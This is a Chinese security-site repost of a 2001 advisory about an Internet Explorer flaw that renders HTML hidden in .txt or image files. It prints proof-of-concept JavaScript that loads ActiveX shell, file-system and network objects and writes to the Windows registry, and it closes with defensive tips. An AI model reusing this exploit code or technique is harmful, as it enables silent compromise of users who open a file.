黑基Web安全攻防班
黑基网 首页 IT技术 安全攻防 查看内容

Crazybird发现的一个,有争议的IE新BUG

2004-9-29 20:05| 投稿: security

摘要: 出现漏洞程序:IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft Outlook,腾讯e...
出现漏洞程序:IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft Outlook,腾讯explorer(IE所有版本都有问题。。我能找到的都测试过!)描述:利用IE对含有HTML语句的文本不检查扩展名达到欺骗用户访问病毒页面的目的详细:在NOTEPAD上写一份HTML文件。保存为.txt。上传至空间服务器,用IE访问URL。发现,IE把.txt误读成.html.更改扩展名.txt改成.jpg或者别的非下载类文件。IE都无法辨认文件类型。利用这个IE漏洞。任何有一点主页制作知识的都可以成功利用此漏洞。由于用户的定式思维,只认为.html/.htm才会被入侵者利用。现在入侵者只要利用此漏洞。完全有能力在.txt.jpg.png....这些被认为十分安全的页面上做到html上所能做的一切攻击行为!甚至邮件附件,以IE直接WEB访问,查看信件的用户。完全没有安全的附件可直接查看!漏洞特别严重!由于漏洞程序所属公司的不负责性,请用户特别小心,邪恶攻击者的非法利用!以下是攻击测试代码:document.write("");function f(){try{//ActiveX initializationa1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();try{if (document.cookie.indexOf("Chg") == -1){Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");var expdate = new Date((new Date()).getTime() + (1));document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"}}catch(e){}}catch(e){}}function init(){setTimeout("f()", 1000);}init();// --> 不受影响系统:netscape(全都没问题。。)解材决方案:1)下载杀毒软件!已有的及时更新病毒库。将系统里比较危险的一些程序改名,比如format.com、deltree.exe等。。。。改成容易记忆的就行比如format.com可以改成format_0.com等。。。。2)尽量不要去访问那些所谓的“黑客”网站。很多时候,你想从那学习攻击。实际上,您正在被攻击!3)如果碰到非去不可的,但您又怀疑有危险的站点。请先访问这http://crazybird.51.net/look.htm)您也可以把上面的源文件复制下来。另存为.htm文件。本地运行。但我不能保证您是否能看出来源文件是否有危险!访问网页,任何类型的网页,打开时如果出现"页面含有不安全的ActiveX"等信息时请注意,最好不要运行该ActiveX控件。同样不能保证任何恶意攻击文件都会给出这类警告!4)邮件附件不要双击直接打开!请注意!是任何类型的附件都不要直接打开!存到文件夹后,用杀毒程序扫一遍。5)及时更新系统补丁。如果还有什么问题可以给我来信(Mail:cr4zybird@hotmail.com)感谢:春之律,skywind,nETMONKEY,xiajian,Nancy 在测试和与微软交涉过程中给我的帮助!crazybirdcr4zybird@hotmail.com#CNFORCE26/7/01发布。。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部